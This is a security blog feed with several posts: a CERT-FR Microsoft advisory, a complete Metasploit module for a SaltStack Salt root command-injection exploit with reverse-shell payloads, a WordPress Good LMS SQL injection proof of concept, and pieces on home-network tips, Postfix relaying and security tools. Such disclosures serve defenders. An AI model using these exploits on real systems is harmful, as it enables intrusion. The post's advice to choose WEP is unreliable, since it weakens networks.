Multiple vulnerabilities in Microsoft products

13 November 2020

November 12, 2020

DOCUMENT MANAGEMENT

Reference CERTFR-2020-AVI-739
Title Multiple vulnerabilities in Microsoft products
First version date November 12, 2020
Latest version date November 12, 2020
Source (s) Microsoft Security Bulletin November 11, 2020
Attachment (s) None
Table 1: Document management
A detailed version control can be found at the end of this document.

RISK (S)

Bypass the security feature
Breach of data confidentiality
Denied service
Remote code execution
Identity theft
Privilege escalation
AFFECTED SYSTEMS
AV1 Video Extension
Azure DevOps Server 2019 Update 1.1
Azure Sphere
ChakraCore
HEIF Image Extension
HEVC Video Extensions
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft 365 Apps for Enterprise for 32-bit systems
Microsoft Dynamics 365 (on-premises) version 8.2
Microsoft Dynamics 365 (on-premises) version 9.0
Microsoft Dynamics CRM 2015 (on-premises) version 7.0
Microsoft Exchange Server 2013 Cumulative Update 23
Microsoft Exchange Server 2016 Cumulative Update 17
Microsoft Exchange Server 2016 Cumulative Update 18
Microsoft Exchange Server 2019 Cumulative Update 6
Microsoft Exchange Server 2019 Cumulative Update 7
Microsoft Teams
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.0
Microsoft Visual Studio 2019 version 16.4 (includes 16.0 – 16.3)
Microsoft Visual Studio 2019 version 16.7 (includes 16.0 – 16.6)
Microsoft Visual Studio 2019 version 16.8
Raw Image Extension
Visual Studio Code
WebP Image Extension

ABSTRACT

Multiple vulnerabilities have been corrected in Microsoft products. They allow an attacker to cause an elevation of privilege, a remote code execution, a breach of data confidentiality, a bypass of the security functionality, a denial of service and an impersonation.

SOLUTION

Refer to the publisher’s security bulletin to obtain patches (see Documentation section).

DOCUMENTATION

Reference CVE CVE-2020-16970
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16970
Reference CVE CVE-2020-16991
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16991
Reference CVE CVE-2020-16993
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16993
Reference CVE CVE-2020-16989
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16989
Reference CVE CVE-2020-16986
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16986
Reference CVE CVE-2020-16988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16988
Reference CVE CVE-2020-16982
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16982
Reference CVE CVE-2020-17018
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17018
Reference CVE CVE-2020-17065
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17065
Reference CVE CVE-2020-17054
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17054
Reference CVE CVE-2020-17063
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17063
Reference CVE CVE-2020-16994
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16994
Reference CVE CVE-2020-17085
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17085
Reference CVE CVE-2020-1325
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1325
Reference CVE CVE-2020-17081
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17081
Reference CVE CVE-2020-16981
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16981
Reference CVE CVE-2020-16984
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16984
Reference CVE CVE-2020-17005
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17005
Reference CVE CVE-2020-17078
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17078
Reference CVE CVE-2020-16987
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16987
Reference CVE CVE-2020-17091
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17091
Reference CVE CVE-2020-17062
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17062
Reference CVE CVE-2020-17100
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17100
Reference CVE CVE-2020-17048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17048
Reference CVE CVE-2020-17086
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17086
Reference CVE CVE-2020-17101
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17101
Reference CVE CVE-2020-17067
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17067
Reference CVE CVE-2020-17106
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17106
Reference CVE CVE-2020-17104
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17104
Reference CVE CVE-2020-17084
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17084
Reference CVE CVE-2020-16985
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16985
Reference CVE CVE-2020-17108
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17108
Reference CVE CVE-2020-16983
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16983
Reference CVE CVE-2020-17064
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17064
Reference CVE CVE-2020-16992
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16992
Reference CVE CVE-2020-17107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17107
Reference CVE CVE-2020-16990
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16990
Reference CVE CVE-2020-17083
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17083
Reference CVE CVE-2020-17105
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17105
Reference CVE CVE-2020-17079
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17079
Reference CVE CVE-2020-17020
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17020
Reference CVE CVE-2020-17006
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17006
Reference CVE CVE-2020-17109
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17109
Reference CVE CVE-2020-17110
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17110
Reference CVE CVE-2020-17021
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17021

Bookmark

ClosePlease login

SaltStack Salt REST API Arbitrary Command Execution Exploit

RiSec.Mitch

13 November 2020

Date added 12-11-2020

This Metasploit module exploits an authentication bypass and command injection in SaltStack Salt’s REST API to execute commands as the root user.

The following versions have received a patch: 2015.8.10, 2015.8.13, 2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10, 2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4, 3001.1, 3001.2, and 3002. Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = ExcellentRanking
 
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SaltStack Salt REST API Arbitrary Command Execution',
        'Description' => %q{
          This module exploits an authentication bypass and command injection in
          SaltStack Salt's REST API to execute commands as the root user.
 
          The following versions have received a patch: 2015.8.10, 2015.8.13,
          2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10,
          2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4,
          3001.1, 3001.2, and 3002.
 
          Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.
        },
        'Author' => [
          'KPC', # CVE-2020-16846 (ZDI-CAN-11143)
          'wvu' # Exploit
        ],
        'References' => [
          ['CVE', '2020-16846'], # Command injection
          ['CVE', '2020-25592'], # Auth bypass
          ['URL', 'https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/']
        ],
        'DisclosureDate' => '2020-11-03', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :bourne,
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
 
    register_options([
      Opt::RPORT(8000),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end
 
  def check
    res = execute_command('')
 
    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end
 
    # Server: CherryPy/18.6.0
    unless res.headers['Server']&.match(%r{^CherryPy/[\d.]+$})
      return CheckCode::Unknown('Target does not appear to be running Salt.')
    end
 
    # {"return": [{}]}
    unless res.code == 200 && res.get_json_document['return'] == [{}]
      return CheckCode::Safe('Auth bypass failed.')
    end
 
    CheckCode::Vulnerable('Auth bypass successful.')
  end
 
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(background: true)
    end
  end
 
  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}") unless cmd.empty?
 
    # https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run
    # https://github.com/saltstack/salt/pull/58871
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'run'),
      'ctype' => 'application/json',
      'data' => {
        'client' => 'ssh',
        'tgt' => '*',
        'fun' => rand_text_alphanumeric(8..42),
        'eauth' => rand_text_alphanumeric(8..42), # Auth bypass
        'ssh_priv' => "/dev/null < /dev/null; (#{cmd}) & #" # Command injection
      }.to_json
    )
  end
 
end

Exploit Author Metasploit

CVE-2020-16846
CVE-2020-25592

Bookmark

ClosePlease login

5 or so Ways to Secure Your Home Network

RiSec.Mitch

13 November 2020

pexels vlada karpovich 4050299 1 960x720 1

Just last week, it was announced that there is a major security exploit that is targeting home Wifi configurations. This is extra troubling since many companies have moved to a work from home employee base. What can you do in order to keep your home network safe? Learn more.

Passwords and Password Management

First things first, passwords. You should be extra thoughtful when choosing your passwords. Every password should be unique to the login area. NEVER use a password more than once and don’t use a password for important work websites on other logins, such as email and social media. This way, it will ensure that if your password is discovered only one area will be affected.

If remembering all those passwords seems impossible, use a password manager like Google Password Manager, to safely store and organize all your passwords. Team Pass can also create strong passwords for you, making it easier than ever to use secure passwords. Use passwords that are a combination of letters, numbers and special characters as well as at least 8 characters in length. Keeping them safe, keeps you safe.

Firmware Update

While working from home, you will need to be sure that your devices and computers on your network have all the latest patches and security updates applied in order to minimize the possibility of someone compromising your network. Updating the firmware on your Router can sound daunting, but it’s quite simple. Simply login to the admin interface on your Router, you typically do this by typing the IP address of the router into your web browser. Once logged in, navigate to the firmware section and check for an update. If one is available, install it. This should help patch any vulnerabilities.

Network Security Key

A network security key, or Wifi key, is another name for your WiFi network password. It is what allows you and your guests to sign on to your wireless network to access the Internet. Network security keys are also what is used to establish secure connections between the user requesting access and the network or wireless device. This protects a network and its associated devices from unwanted access. You will want to choose a strong WiFi password in order to keep your network safe. If your router came with a password preloaded, it is a good idea to update it to something more secure.

VPN (Virtual Private Network)

Many companies deal with confidential data and you should be extra cautious of your home network configuration when dealing with this type of information. To keep your data and web browsing extra secure, you should consider a VPN, or Virtual Private Network.

A VPN works by routing your device’s internet connection through your chosen VPN’s private server, instead of your internet service provider’s (ISP) server. There are many companies that offer VPN services for free, or for a small dollar amount.

Disable Network Name Broadcasting

It is smart to disable the broadcasting of your Wifi network name (also know as SSID – Service Set Identifier), so that only people you’ve given your SSID to can access the network. If your network doesn’t show up in the WiFi, it will make it more difficult for someone to log on to it without permission.

Enable Network Encryption

Encryption on your wireless network means that the WiFi signal will be scrambled so unauthorized computers and devices aren’t able to understand the data that is being transferred across your WiFi network. To enable encryption on your WiFi network, open the wireless security settings on your router’s configuration page. This will usually let you select which security method you wish to choose; if you have older devices, choose WEP, otherwise go with WPA2.

If you follow the above recommendations, your home network and data should be protected. What additional security steps have you taken since moving to a remote work environment? Leave your comments below. As always, share this post with your friends and family to help keep them safe too!

Bookmark

ClosePlease login

Port 25? Nope. Configure Postfix to Send Mail Using an External SMTP Server

RiSec.Mitch

13 November 2020

There are many reasons why you would want to configure Postfix to send email using an external SMTP provider such as Mandrill, SendGrid, Amazon SES, or any other SMTP server. One reason is to avoid getting your mail flagged as spam if your current server’s IP has been added to a spam list. Another very common reason would be being stuck behind port 25 (other ports included with some hosts) – host restricted, it’s becoming ever so common now due to the vulnerable nature of a mail-server being on such a common port. To name a few restricting hosts – Linode – Google Cloud.

In this tutorial, you will learn how to install and configure a Postfix server to send email through Mandrill, or SendGrid.

Prerequisites

Before starting this tutorial, you should have:

Your fully qualified domain name (FQDN)
All updates installed :sudo apt-get update
A valid username and password for the SMTP mail provider, such as Mandrill, or SendGrid
Make sure the libsasl2-modules package is installed and up to date:sudo apt-get install libsasl2-modules

(All commands featured in this guide are intended for non-root users)

Installing Postfix

In this section, you will install Postfix and set the domain and hostname.

Install Postfix with the following command:sudo apt-get install postfix
During the installation, a prompt will appear asking for your General type of mail configuration.Select Internet Site.
Enter the fully qualified name of your domain, fqdn.example.com.
Once the installation is finished, open the /etc/postfix/main.cf file with your favorite text editor:sudo nano /etc/postfix/main.cf
Make sure that the myhostname parameter is configured with your server’s FQDN:File: /etc/postfix/main.cf1 myhostname = fqdn.example.com

Configuring SMTP Usernames and Passwords

Usernames and passwords are generally stored in a file called sasl_passwd in the /etc/postfix/ directory. In this section, you’ll add your external mail provider credentials to this file and to Postfix.

If you want to use Mandrill, or SendGrid as your SMTP provider, you may want to reference the appropriate example while working on this section. For Google Apps and Gmail-specific settings (Scroll down)

Open or create the /etc/postfix/sasl_passwd file, using your favorite text editor:

sudo nano /etc/postfix/sasl_passwd

Add your destination (SMTP Host), username, and password in the following format:

File: /etc/postfix/sasl_passwd

[mail.isp.example] username:password

If you want to use a port other than the default smtp port use the following format:

[mail.isp.example]:587 username:password

Create the hash db file for Postfix by running the postmap command:

sudo postmap /etc/postfix/sasl_passwd

Securing Your Password and Hash Database Files

The /etc/postfix/sasl_passwd and the /etc/postfix/sasl_passwd.db files created in the previous steps contain your SMTP credentials in plain text.

For security reasons, you should change their permissions so that only the root user can read or write to the file. Run the following commands to change the ownership to root and update the permissions for the two files:

sudo chown root:root /etc/postfix/sasl_passwd /etc/postfix/sasl_passwd.db
sudo chmod 0600 /etc/postfix/sasl_passwd /etc/postfix/sasl_passwd.db

Configuring the Relay Server

In this section, you will configure the /etc/postfix/main.cf file to use the external SMTP server.

Open the /etc/postfix/main.cf file with your favorite text editor:sudo nano /etc/postfix/main.cf
Update the relayhost parameter to show your external SMTP relay host. Important: If you specified a non-default TCP port in the sasl_passwd file, then you must use the same port when configuring the relayhost parameter.

File: /etc/postfix/main.cf

relayhost = [mail.isp.example]:587

3. At the end of the file, add the following parameters to enable authentication:

File: /etc/postfix/main.cf

smtp_sasl_auth_enable = yes
smtp_sasl_security_options = noanonymous
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
smtp_use_tls = yes
smtp_tls_CAfile = /etc/ssl/certs/ca-certificates.crt

3. Save your changes

4. Restart the post fix server – “sudo service postfix restart”

Walla. Job done.

OH! But what about configurations with other providers?

This section shows you settings for some popular mail services you can use as external SMTP servers. You may have to do some fine-tuning on your own to avoid Postfix logins being flagged as suspicious.

Settings for Mandrill

Use these settings for Mandrill.

For /etc/postfix/sasl_passwd, use the following configuration with your own credentials:

File: /etc/postfix/sasl_passwd

[smtp.mandrillapp.com]:587 USERNAME:API_KEY

2. For /etc/postfix/main.cf, use the following relayhost:

File: /etc/postfix/main.cf

relayhost = [smtp.mandrillapp.com]:587

3. Create the hash db file for Postfix by running the postmap command:

sudo postmap /etc/postfix/sasl_passwd

4. Restart postfix

sudo service postfix restart

Settings for SendGrid

Use these settings for SendGrid.

For /etc/postfix/sasl_passwd, use the following configuration with your own credentials:

File: /etc/postfix/sasl_passwd

[smtp.sendgrid.net]:587 USERNAME:PASSWORD

2. For /etc/postfix/main.cf, use the following relayhost:

File: /etc/postfix/main.cf

relayhost = [smtp.sendgrid.net]:587

3. Create the hash db file for Postfix by running the postmap command:

sudo postmap /etc/postfix/sasl_passwd

4. Restart Postfix:

sudo service postfix restart

5. Go enjoy.

Bookmark

ClosePlease login

WordPress Good LMS 2.1.4 SQL Injection Vulnerability

RiSec.Mitch

12 November 2020

Date added: 12-11-2020

Author: A. Alaseeri Risk: H

# Exploit Title: WordPress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
# Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
# Version: <= 2.1.4
# Dork: N/A
# Author: Abdulazeez Alaseeri
# Tested on: linux/apache
# Type: Web App
# Category: Web App
 
 
================================================================
Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4
================================================================
 
Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
 
Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701
================================================================
Start Vulnerable Code
================================================================
682-  add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
683-  add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
684-  function gdlr_lms_cancel_booking(){
685-    global $wpdb;
686-
687-    $sql  = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment ';
688-    $sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
689-    $sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')';
690-    $booked_course = $wpdb->get_row($sql);
691-    if( !empty($booked_course) ){
692-      $payment_info = unserialize($booked_course->payment_info);
693-
694-      $course_options = gdlr_lms_get_course_options($booked_course->course_id);
695-      $course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']);
696-      update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE)));
697-
698-      $wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d'));
699-    }
700-    die("");
701-  }
================================================================
End Vulnerable Code
================================================================
Line 682 means that function "gdlr_lms_cancel_booking" can be called using "/wp-admin/admin-ajax.php" by having any low privileged account such as subscriber or contributor. However the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user. Following URL means that an attacker is already inside function "gdlr_lms_cancel_booking".
 
http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking
 
SQL Injection on line 688 is pretty simple to understand that an arbitrary user input in POST Request is sent straight into the MySQL Query as variable "id"
 
$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
 
Following are the Request Headers as POC which demonstrates MySQL SLEEP Query.
 
================================================================
Request Headers Start
================================================================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
 
action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)
================================================================
Request Headers Finish
================================================================

Bookmark

ClosePlease login

20+ best free security tools

Steven Black (n0tst3)

12 November 2020

universal multifunctional tool swiss army knife toolkit by malerapaso gettyimages 1200x800 100756967 large

Who doesn’t love free software?

Infosec professionals are fortunate to have many good free tools for a range of tasks. The following list of nearly two dozen tools include everything from password crackers to vulnerability management systems to networks analyzers. Whatever your security role is, you’ll find something useful in this list.

Here, in no particular, order are the 20+ best free security tools:

Maltego
OWASP Zed Attack Proxy (ZAP)
Samurai Web Testing Framework
Kali Linux
Fierce Domain Scan
The Harvester
Hping
John the Ripper
Nessus
NMap
OpenVPN
Ophcrack
OWASP Python Security Project
Wireshark
ModSecurity
Burp Suite
Metasploit
Aircrack-ng
TAILS
Qubes OS
Signal

Maltego

Originally developed by Paterva, Maltego is a forensics and open-source intelligence (OSINT) app designed to deliver a clear threat picture for the user’s environment. It will demonstrate the complexity and severity of single points of failure as well as trust relationships that exist within the scope of one’s infrastructure. It pulls in information posted all over the Internet, whether it’s the current configuration of a router on the edge of the company network or the current whereabouts of your company’s vice president. The commercial license does have a price tag, but the community edition is free with some restrictions.

OWASP Zed Attack Proxy (ZAP)

The Zed Attack Proxy (ZAP) is a user-friendly penetration testing tool that finds vulnerabilities in web apps. It provides automated scanners and a set of tools for those who wish to find vulnerabilities manually. It’s designed to be used by practitioners with a wide range of security experience, and is ideal for functional testers who are new to pen testing, or for developers: There’s even an official ZAP plugin for the Jenkins continuous integration and delivery application.

Samurai Web Testing Framework

The Samurai Web Testing Framework is a virtual machine packed with some of the other items you’ll see in this slideshow, and functions as a web pen-testing environment. You can download a ZIP file containing a VMware image with a host of free and open source tools to test and attack websites.

Tools include the Fierce domain scanner and Maltego. For mapping it uses WebScarab and ratproxy. Discovery tools include w3af and burp. For exploitation, the final stage, it includes AJAXShell, the browser exploitation framework BeEF and others. There’s a trade-off for all this convenience, though: The developers’ mailing list has been dormant for the last couple years, and the latest SamuraiWTF release, 3.3.2, was packaged in 2016 so many of the tools it contains are outdated versions.

Kali Linux

Kali Linux is the Linux-based pen-testing distribution previously known as BackTrack. Security professionals use it to perform assessments in a purely native environment dedicated to hacking. Users have easy access to a variety of tools ranging from port scanners to password crackers. You can download ISOs of Kali to install on 32-bit or 64-bit x86 systems, or on ARM processors. It’s also available as a VM image for VMware or Hyper-V.

Kali’s tools are grouped into the following categories: information gathering; vulnerability analysis; wireless attacks; web applications, exploitation tools, stress testing, forensics, sniffing and spoofing, password attacks, maintaining access, reverse engineering, reporting, and hardware hacking.

Fierce Domain Scan

Another venerable tool, Fierce Domain Scan was last updated by developer Robert Hansen (RSnake) back in 2007. As he described on his ha.ckers blog, it “was born out of personal frustration after performing a web application security audit.

Fierce pinpoints likely targets inside and outside a corporate network by looking at DNS entries. It is essentially a reconnaissance tool, a Perl script built to scan domains within minutes, using a variety of tactics. Although Hansen has shut down his blog, Fierce lives on in this Github repository. Because the underlying principles of DNS haven’t changed in the last decade, Fierce still works.

The Harvester

The Harvester is an OSINT tool used to obtain subdomain names, email addresses and usernames relating to a domain, drawing on public sources such as Google and LinkedIn. A favorite among pen testers, it lets the user conduct passive reconnaissance and build target profiles that include a list of usernames and email addresses — or research the exposure of their own domain.

Hping

Hping is a command-line tool that can be used to assemble and analyze custom TCP/IP packets. It can be used for firewall testing, port scanning, network testing using different protocols, OS fingerprinting and as an advanced traceroute. It runs on Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, and Windows. It hasn’t been updated in years but then, neither has TCP/IP.

John the Ripper

John the Ripper is a password cracker available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS — although you’ll likely have to compile the free version yourself. It’s mainly used to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version. An enhanced community version includes support for GPUs to accelerate the search.

Nessus

Nessus is one of the world’s most popular vulnerability and configuration assessment tools. It started life as an open-source project, but developer Tenable switched to a proprietary license way back in version 3. As of October 2020, it’s up to version 8.12.1. Despite that, Nessus is still free for personal use on home networks, where it will scan up to 16 IP addresses. A commercial version will allow you to scan an unlimited number of IP addresses. According to the Tenable website, Nessus features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration and vulnerability analysis.

NMap

Nmap is an open-source tool for network exploration and security auditing, and its developers are still updating it, over 20 years after its launch. It’s built to rapidly scan large networks, though it also works against single hosts. According to the NMap website, the scanner uses raw IP packets to determine what hosts are available on the network, which services those hosts are offering, what operating systems they are running, what types of packet filters/firewalls are in use, and dozens of other characteristics. It’s not just for security audits: it can also be used for network inventory, managing service upgrade schedules or — if you believe its appearances in various Hollywood films — for hacking brains and tracking superheroes. A versatile tool indeed.

OpenVPN

OpenVPN is an open-source SSL VPN tool that works in a wide range of configurations, including remote access, site-to-site VPNs, Wi-Fi security, and enterprise-scale remote access solutions. It offers load balancing, failover, and fine-grained access controls. A packaged installer is available for Windows machines, and the code can also run on OpenBSD, FreeBSD, NetBSD, Mac OS X, and Solaris.

Ophcrack

Ophcrack is a free tool for cracking Windows passwords using rainbow tables. It runs on multiple platforms and has a graphical user interface showing real-time graphs to analyze the passwords. It can crack passwords using LM (Windows XP) and NTLM (Vista, 7) hashes using the free rainbow tables available on the site. It also has a brute-force module for simple password and can even dump and load hashes from an encrypted Security Account Manager (SAM) recovered from a Windows partition.

OWASP Python Security Project

The OWASP Python Security Project set out to create a hardened version of Python allowing developers to build applications for use in high-risk environments and ended up building the largest collection of information about security in the Python programming language. The team focused on two areas: the functional and structural analysis of python applications and open-source code, and on a black-box analysis of the Python interpreter. The project website has a wiki listing all the security concerns they identified.

Wireshark

Wireshark is a network protocol analyzer that lets users capture and interactively browse traffic running on a computer network. In its more than 20-year development history, it has acquired a long list of features including live capture and offline analysis, and deep inspection of hundreds of protocols, with more being added all the time. It is multi-platform, running on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD and others. Among its more esoteric features it can analyse VOIP traffic; decrypt SSL/TLS, WEP and WPA/WPA2 traffic, and read traffic carried over USB, Bluetooth and even Frame Relay (remember that?)

ModSecurity

ModSecurity is a web application monitoring, logging and access control toolkit developed by Trustwave’s SpiderLabs Team. It can perform full HTTP transaction logging, capturing complete requests and responses; conduct continuous security assessments; and harden web applications. You can embed it in your Apache 2.x installation or deploy it as a reverse proxy to protect any web server.

Burp Suite

Burp Suite is a web app security testing platform. Its various tools support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Tools within the suite include a proxy server, web spider, intruder and a so-called repeater, with which requests can be automated. Portswigger offers a free edition that’s lacking the web vulnerability scanner and some of the advanced manual tools.

Metasploit

HD Moore created the Metasploit Project in 2003 to provide the security community with a public resource for exploit development. This project resulted in the Metasploit Framework, an open source platform for writing security tools and exploits. In 2009, Rapid7, a vulnerability management solution company, acquired the Metasploit Project. Prior to the acquisition, all development of the framework occurred in the developer’s spare time, eating up most weekends and nights. Rapid7 agreed to fund a full-time development team and keep the source code under the three-clause BSD license that is still in use today.

Aircrack-ng

What Wireshark does for Ethernet, Aircrack-ng does for Wi-Fi. In fact, it’s a complete suite of tools for monitoring packets, testing hardware, cracking passwords and launching attacks on Wi-Fi networks. Version 1.2, released in April 2018, brings big improvements in speed and security and extends the range of hardware Aircrack-ng can work with.

TAILS

The Amnesiac Incognito Live System (TAILS for short) is a live Linux operating system that you can run from a DVD or USB stick. It’s amnesiac because it doesn’t keep track of your activities from one session to the next, and incognito because it uses Tor for all internet communications. It’s possible to reveal your identity to someone monitoring your Tor connection if you log in to, say, your social networking account, but if you don’t do anything stupid like that, TAILS can go a long way to keeping your online activity secret.

Qubes OS

Qubes OS modestly describes itself as “a reasonably secure operating system.” It uses the Xen hypervisor to compartmentalize functions in different virtual machines or “qubes”. This allows different activities to be isolated in different qubes. How far you go with this is up to you. If you’re only slightly worried, you might perform your internet banking in one qube, and all your other online activities in another. If you’re really concerned, you might create a new, disposable qube for every email attachment you open, providing some level of assurance that a malicious attachment can’t take over your whole machine. It’s a free download, but you’ll need a 64-bit Intel or AMD machine with 4GB of RAM and 32GB of disk space.

Signal

Signal is a messaging and voice-and-video-calling app offering end-to-end encryption: That means that even its developers can’t intercept or decrypt your conversations. It’s free for use on Android, iOS or desktop machines running macOS, Linux or Windows. It offers functions such as disappearing messages (that vanish a sender-selectable time after they are read), encrypted group chats, and picture messaging. The Electronic Frontier Foundation suggests using Signal as part of its “Surveillance Self Defense” guide.

And there you have it, 20+ of the best free sec tools available today.

Bookmark

ClosePlease login

Silver Peak addresses three-pronged RCE exploit in Unity Orchestrator

RiSec.CJB

12 November 2020

This is umm interesting – a chained attack could ‘shut down a company’s entire international network’

Silver Peak’s Unity Orchestrator, a centralized SD-WAN management platform, contained three security vulnerabilities that, chained together, could result in pre-authenticated remote code authentication (RCE).

Users have been urged to upgrade their systems after Silver Peak patched the authentication bypass, file delete path traversal, and arbitrary SQL query execution flaws.

